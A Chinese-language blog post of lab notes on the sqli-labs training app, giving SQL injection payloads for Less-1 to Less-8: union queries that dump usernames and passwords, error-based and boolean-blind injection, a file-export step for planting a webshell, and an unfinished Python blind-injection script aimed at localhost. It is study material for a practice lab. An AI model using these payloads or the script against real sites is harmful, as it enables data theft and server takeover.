文章
「安全笔记」 sqli-labs 从注入到删库

「安全笔记」 sqli-labs 从注入到删库

资源介绍参数
资源类别: 代码笔记
如遇问题: 联系客服/留言反馈
前言:为了更好的学习,可以在sql语句下面插入这句话。echo "your sql statement is ".$sql."
";这样可以在网页里看到你的sql查询语句。手注基本步骤、引导闭合语句...

前言

为了更好的学习,可以在sql语句下面插入这句话。

  1. echo "your sql statement is ".$sql."<br>";

这样可以在网页里看到你的sql查询语句。

手注基本步骤、引导闭合语句:

  1. or 1=1--+
  2. 'or 1=1--+
  3. "or 1=1--+
  4. )or 1=1--+
  5. ')or 1=1--+
  6. ") or 1=1--+
  7. "))or 1=1--+
  8. --+ 可以用#替换,url 提交过程中 Url 编码后的#为%23
  9. orand判断 判断是否存在注入
  10. or 1=1 不报错 or 1=2 报错
  11. and 1=1 不报错 and 1=2 报错

然后用order by 来判断字段数,可以用对分查找快速排查
最后在显示位上替换要查找的信息即可

Less-1

  1. ?id=1' and 1=1--+ #正常
  2. ?id=1' and 1=2--+ #错误 存在注入
  3. ?id=1' and order by 4--+ #错误
  4. ?id=1' and order by 3--+ #正常 判断有三个字段
  5. ?id=1' union select 1,2,3--+ #找到2,3显示位
  6. ?id=1' union select 1.2,database()--+ #查找当前数据库名称 
  7. ?id=1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+ #查找所有数据库
  8. ?id=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ #查询数据库下的数据表
  9. ?id=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ #查询数据表下的字段
  10. ?id=0%27 union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+ #查询password和username字段

Less-2-4

?id=1 (数值型)
?id=1′)
?id=1")

less-5

基于报错的sql注入

  1. ?id=1' and extractvalue(1,concat(0x5c,database()));

详细可以参考这里
从这一关开始,就发现自己菜的真真实实。

「安全笔记」 sqli-labs 从注入到删库

less-6

  1. ?id=1" 报错注入

less-7

导出文件,需要满足几个条件
1.root权限
2.绝对路径
?id=1')) UNION SELECT 1,2,3 into outfile "文件的绝对路径"
可以一条条导入,也可以导入一句话木马菜刀连接

less-8

布尔盲注,常用函数

  1. Length()函数 返回字符串的长度
  2. Substr()截取字符串
  3. Ascii()返回字符的ascii
  4. ?id=1' and length(database())=8--+ //手注要一个个猜解,猜中了返回正常,猜错了不正常。
  5. ?id=1' and ascii(substr(database(),1,1))>97 //通过ascii猜database第一个字符,返回正常就猜一个更大的,然后用对分查找快速排查

附一个py脚本,第一次写脚本,我怎么这么菜=,写的不好,轻喷(而且未完成,未优化)

  1. import requests
  2. import sys
  4. url = "http://localhost/sqli-labs-master/Less-8/?id=1"
  5. chars = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_!@#$%^&*()'
  7. def get_DBname_len():
  8.     print("Start to get DBname len....")
  9.     DBname_len= 0
  10.     global url
  11.     url_template = url+"' and length(database())={0}%23"
  12.     for i in range(20):
  13.         newUrl=url_template.format(i)
  14.         res = requests.get(newUrl)
  15.         if 'You' in res.text:
  16.             DBname_len=i
  17.             print("DBName length is: n", DBname_len)
  18.             break
  19.     return DBname_len
  20. def get_DBname():
  21.     print("Start to retrieve database name...")
  22.     DBname = ""
  23.     url_template = url + "' and ascii(substr(database(),{0},1))={1}%23"
  24.     max = get_DBname_len()+1
  25.     print("DBName is:")
  26.     for i in range(1,max):
  27.         for j in chars:
  28.             newUrl =url_template.format(i,ord(j))
  29.             res = requests.get(newUrl)
  30.             if 'You' in res.text:
  31.                 sys.stdout.write(j)
  32.                 sys.stdout.flush()
  33.                 DBname = DBname+j
  34.                 break
  35. def get_Table_Num():
  36.     print("nStart to retrieve database number")
  37.     num=0
  38.     url_template=url+"' and (select count(table_name)a from information_schema.tables where table_schema = database() having a={0})%23"
  39.     for i in range(1,20):
  40.         newUrl = url_template.format(i)
  41.         res = requests.get(newUrl)
  42.         if 'You' in res.text:
  43.             num=i
  44.             break
  45.     print("table number is:",num)
  46.     return num
  47. def get_Tables_len():
  48.     url_template = url+"' and length((select table_name from information_schema.tables where table_schema=database() limit {0},1))={1}%23"
  49.     tables_len=[]
  50.     for i in range(5):
  51.         for j in range(1,20):
  52.             newUrl = url_template.format(i,j)
  53.             res = requests.get(newUrl)
  54.             if 'You' in res.text:
  55.                 tables_len.append(j)
  56.                 break
  57.     return tables_len
  58. def get_Table_Name():
  59.     print("nStart to get Table name")
  60.     presentName=''
  61.     tables_len=get_Tables_len()
  62.     presentNameLen=0
  63.     max_num = int(get_Table_Num())+1
  64.     url_template= url+"' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1)))={2}%23"
  65.     for i in range(max_num):
  66.         for j in range(20):
  67.             for k in chars:
  68.                 newUrl =url_template.format(i,j,ord(k))
  69.                 res = requests.get(newUrl)
  70.                 if 'You' in res.text:
  71.                     sys.stdout.write(k)
  72.                     sys.stdout.flush()
  73.                     presentNameLen+=1
  74.                     break
  75.             if presentNameLen==tables_len[i]:
  76.                 presentNameLen=0
  77.                 sys.stdout.write('n')
  78.                 break
  79.     print("End of search",end='')
  80. get_Table_Num()
  81. get_DBname()
  82. get_Table_Name()

相关文章:

  1. 「安全笔记」 CTF-SSH 私钥泄露靶场前言 CTF-SSH 私钥泄露,如何从外部进入最终获得root主机。话不多说直接开始攻击机kali linux开启两台机器,两台设置同样的网络模式,靶机无登陆密码,需要通过ssh远程登陆kali登陆,ifconfig查看ip,然后使用netdiscover -r ip/mask...
  2. 「安全笔记」 CTF-SSH 服务测试注意这里的靶场由于版本的问题,只能使用VM VirtualBox安装,攻击机用kali Linux在VMware上安装,这里有个坑,在配置网络的时候,全部选择桥接模式,但是VMware下 编辑->虚拟网络编辑器->更改设置->nat0网卡桥接到的外部网络需要和VirtualBox桥接到的一致,不然搜索不到网络,而且桥接模式模拟真实计算机在网络中,利用本机网卡来获取地址的。...
  3. 「安全笔记」2019 Hgame week 1-2 writeupH-Game,不是那种。。 WEB week-1 谁吃了我的flag? 题干提示了vim,没好好关机,知道了是Linux的vim异常退出 所以访问 .index.html.swp得到swp,扔到Linux里vim .index.html.swp -r恢复,得到flag,这里注 …...
  4. 「安全笔记」php反序列化 漏洞笔记hp反序列化 漏洞笔记,序列化格式php序列化后的内容是简单的文本格式,但对字母大小写和空白敏感,而字符串是按照字节(或者说是8位的字符)计算的,因此更适合的说法是php序列化的内容是字节流格式....
  5. 「安全笔记」CVE-2018-12613复现CVE-2018-12613 phpMyAdmin后台文件包含溯源 flask项目差不多告一段落了,最近做ctf意识到代码审计的问题,对于源码阅读还是很差,打算省赛结束开始php学习,提高代码审计能力,先从一些简单的cve开始,学 …...
  6. 「CTF心得」i春秋不欢乐赛涨的姿势gift php plus 这题就比较有意思了(个屁)首先提示 Do you know .swp file?然后用WangYiHang大佬的工具扫一下后台,找到.index.php.swp这个文件,然后扔到Linux里用vi恢复。vi -r 文件名 #swp文件是vi不正常退出产生的,用-r可以恢复......
声明:本文为原创作品,版权归作者所有。未经许可,不得转载或用于任何商业用途。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
sqli-labs安全注入网络安全
猜你喜欢
0 条回复 A文章作者 M管理员
欢迎您,新朋友,感谢参与互动!
    暂无讨论,说说你的看法吧

请输入验证码

请输入图片中的验证码
点击发送按钮获取验证码

取消
×
×
¥undefined
请打开手机使用微信扫码支付
×

....支付确认中....

×
支付金额

undefined
×
积分支付
您当前的积分为0

检测到您未绑定微信账户,请先绑定微信

立刻绑定
确定
×

打开微信扫一扫

扫码并「关注我们的公众号」安全快捷登录

×

下载海报: